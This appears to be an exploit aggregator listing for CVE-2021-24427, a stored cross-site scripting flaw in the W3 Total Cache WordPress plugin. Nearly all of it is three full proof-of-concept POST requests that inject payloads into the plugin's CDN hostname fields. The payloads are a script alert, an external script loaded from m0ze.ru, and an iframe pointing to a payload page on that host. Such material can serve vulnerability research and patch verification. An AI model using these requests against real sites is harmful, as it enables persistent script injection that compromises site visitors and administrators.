Exploit for W3 Total Cache < 2.1.3 - Authenticated Stored XSS CVE-2021-24427

Name: Exploit for W3 Total Cache < 2.1.3 - Authenticated Stored XSS CVE-2021-24427
Rating: 5 (279 reviews)
2021-06-16 | CVSS 3.5
## https://sploitus.com/exploit?id=WPEX-ID:5DA5CE9A-82A6-404F-8DEC-795D7905B3F9
Vulnerable parameter(s): &cdn_cnames[]= (#1), cdn_cnames[]= (#2), cdn_cnames[]= (#3).

CDN Type: Akamai, Amazon CloudFront, AT&T, Cotendo, Generic Mirror, Verizon Digital Media Services (EdgeCast), Amazon CloudFront Over S3, Amazon Simple Storage Service (S3), Amazon Simple Storage Service (S3) Compatible, Microsoft Azure Storage, Self-hosted.

PoC #1 | Authenticated Persistent XSS | CDN > Replace site's hostname with (reserved for CSS):

POST /wp-admin/admin.php?page=w3tc_cdn HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 2204

cdn__uploads__enable=0&cdn__uploads__enable=1&cdn__includes__enable=0&cdn__includes__enable=1&cdn__theme__enable=0&cdn__theme__enable=1&cdn__custom__enable=0&cdn__custom__enable=1&cdn__force__rewrite=0&cdn__canonical_header=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54a0bbb254&cdn__ftp__pasv=0&cdn__ftp__host=&cdn__ftp__type=&cdn__ftp__user=&cdn__ftp__pass=&cdn__ftp__path=&cdn__ftp__ssl=auto&cdn_cnames%5B%5D=%23%27%22%3E%3Cscript%3Ealert%28%29%3B%3C%2Fscript%3E%3Cdiv+x&cdn_cnames%5B%5D=&cdn_cnames%5B%5D=&cdn_cnames%5B%5D=&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54a0bbb254&w3tc_default_save_and_flush=Save+Settings+%26+Purge+Caches&cdn__flush_manually=0&cdn__reject__ssl=0&cdn__admin__media_library=0&cdn__cors_header=0&cdn__cors_header=1&cdn__reject__logged_roles=0&cdn__reject__roles=&cdn__reject__uri=&cdn__autoupload__enabled=0&cdn__autoupload__interval=3600&cdn__queue__interval=900&cdn__queue__limit=25&cdn__includes__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.xml&cdn__theme__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.ico%3B*.ttf%3B*.otf%3B*.woff%3B*.woff2%3B*.less&cdn__import__files=&cdn__custom__files=favicon.ico%0D%0A%7Bwp_content_dir%7D%2Fgallery%2F*%0D%0A%7Bwp_content_dir%7D%2Fuploads%2Favatars%2F*%0D%0A%7Bplugins_dir%7D%2Fwordpress-seo%2Fcss%2Fxml-sitemap.xsl%0D%0A%7Bplugins_dir%7D%2Fwp-minify%2Fmin*%0D%0A%7Bplugins_dir%7D%2F*.js%0D%0A%7Bplugins_dir%7D%2F*.css%0D%0A%7Bplugins_dir%7D%2F*.gif%0D%0A%7Bplugins_dir%7D%2F*.jpg%0D%0A%7Bplugins_dir%7D%2F*.png&cdn__reject__ua=&cdn__reject__files=%7Buploads_dir%7D%2Fwpcf7_captcha%2F*%0D%0A%7Buploads_dir%7D%2Fimagerotator.swf%0D%0A%7Bplugins_dir%7D%2Fwp-fb-autoconnect%2Ffacebook-platform%2Fchannel.html&set_cookie_domain_old=0&set_cookie_domain_new=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54a0bbb254



PoC #2 | Authenticated Persistent XSS | CDN > Replace site's hostname with (reserved for JS in <head>):

POST /wp-admin/admin.php?page=w3tc_cdn HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 2204

cdn__uploads__enable=0&cdn__uploads__enable=1&cdn__includes__enable=0&cdn__includes__enable=1&cdn__theme__enable=0&cdn__theme__enable=1&cdn__custom__enable=0&cdn__custom__enable=1&cdn__force__rewrite=0&cdn__canonical_header=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54d06077f1&cdn__ftp__pasv=0&cdn__ftp__host=&cdn__ftp__type=&cdn__ftp__user=&cdn__ftp__pass=&cdn__ftp__path=&cdn__ftp__ssl=auto&cdn_cnames%5B%5D=1&cdn_cnames%5B%5D=m0ze.ru%2Fpayload%2Fa.js%27+onload%3D%27alert%2813%29%3B%27+stuff%3D%27&cdn_cnames%5B%5D=&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54d06077f1&w3tc_default_save_and_flush=Save+Settings+%26+Purge+Caches&cdn__flush_manually=0&cdn__reject__ssl=0&cdn__admin__media_library=0&cdn__cors_header=0&cdn__cors_header=1&cdn__reject__logged_roles=0&cdn__reject__roles=&cdn__reject__uri=&cdn__autoupload__enabled=0&cdn__autoupload__interval=3600&cdn__queue__interval=900&cdn__queue__limit=25&cdn__includes__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.xml&cdn__theme__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.ico%3B*.ttf%3B*.otf%3B*.woff%3B*.woff2%3B*.less&cdn__import__files=&cdn__custom__files=favicon.ico%0D%0A%7Bwp_content_dir%7D%2Fgallery%2F*%0D%0A%7Bwp_content_dir%7D%2Fuploads%2Favatars%2F*%0D%0A%7Bplugins_dir%7D%2Fwordpress-seo%2Fcss%2Fxml-sitemap.xsl%0D%0A%7Bplugins_dir%7D%2Fwp-minify%2Fmin*%0D%0A%7Bplugins_dir%7D%2F*.js%0D%0A%7Bplugins_dir%7D%2F*.css%0D%0A%7Bplugins_dir%7D%2F*.gif%0D%0A%7Bplugins_dir%7D%2F*.jpg%0D%0A%7Bplugins_dir%7D%2F*.png&cdn__reject__ua=&cdn__reject__files=%7Buploads_dir%7D%2Fwpcf7_captcha%2F*%0D%0A%7Buploads_dir%7D%2Fimagerotator.swf%0D%0A%7Bplugins_dir%7D%2Fwp-fb-autoconnect%2Ffacebook-platform%2Fchannel.html&set_cookie_domain_old=0&set_cookie_domain_new=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54d06077f1



PoC #3 | Authenticated Persistent XSS | CDN > Replace site's hostname with (reserved for JS after <body>):

POST /wp-admin/admin.php?page=w3tc_cdn HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 2204

cdn__uploads__enable=0&cdn__uploads__enable=1&cdn__includes__enable=0&cdn__includes__enable=1&cdn__theme__enable=0&cdn__theme__enable=1&cdn__custom__enable=0&cdn__custom__enable=1&cdn__force__rewrite=0&cdn__canonical_header=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54cf6ef099&cdn__ftp__pasv=0&cdn__ftp__host=&cdn__ftp__type=&cdn__ftp__user=&cdn__ftp__pass=&cdn__ftp__path=&cdn__ftp__ssl=auto&cdn_cnames%5B%5D=1&cdn_cnames%5B%5D=2&cdn_cnames%5B%5D=%23%27%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54cf6ef099&w3tc_default_save_and_flush=Save+Settings+%26+Purge+Caches&cdn__flush_manually=0&cdn__reject__ssl=0&cdn__admin__media_library=0&cdn__cors_header=0&cdn__cors_header=1&cdn__reject__logged_roles=0&cdn__reject__roles=&cdn__reject__uri=&cdn__autoupload__enabled=0&cdn__autoupload__interval=3600&cdn__queue__interval=900&cdn__queue__limit=25&cdn__includes__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.xml&cdn__theme__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.ico%3B*.ttf%3B*.otf%3B*.woff%3B*.woff2%3B*.less&cdn__import__files=&cdn__custom__files=favicon.ico%0D%0A%7Bwp_content_dir%7D%2Fgallery%2F*%0D%0A%7Bwp_content_dir%7D%2Fuploads%2Favatars%2F*%0D%0A%7Bplugins_dir%7D%2Fwordpress-seo%2Fcss%2Fxml-sitemap.xsl%0D%0A%7Bplugins_dir%7D%2Fwp-minify%2Fmin*%0D%0A%7Bplugins_dir%7D%2F*.js%0D%0A%7Bplugins_dir%7D%2F*.css%0D%0A%7Bplugins_dir%7D%2F*.gif%0D%0A%7Bplugins_dir%7D%2F*.jpg%0D%0A%7Bplugins_dir%7D%2F*.png&cdn__reject__ua=&cdn__reject__files=%7Buploads_dir%7D%2Fwpcf7_captcha%2F*%0D%0A%7Buploads_dir%7D%2Fimagerotator.swf%0D%0A%7Bplugins_dir%7D%2Fwp-fb-autoconnect%2Ffacebook-platform%2Fchannel.html&set_cookie_domain_old=0&set_cookie_domain_new=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54cf6ef099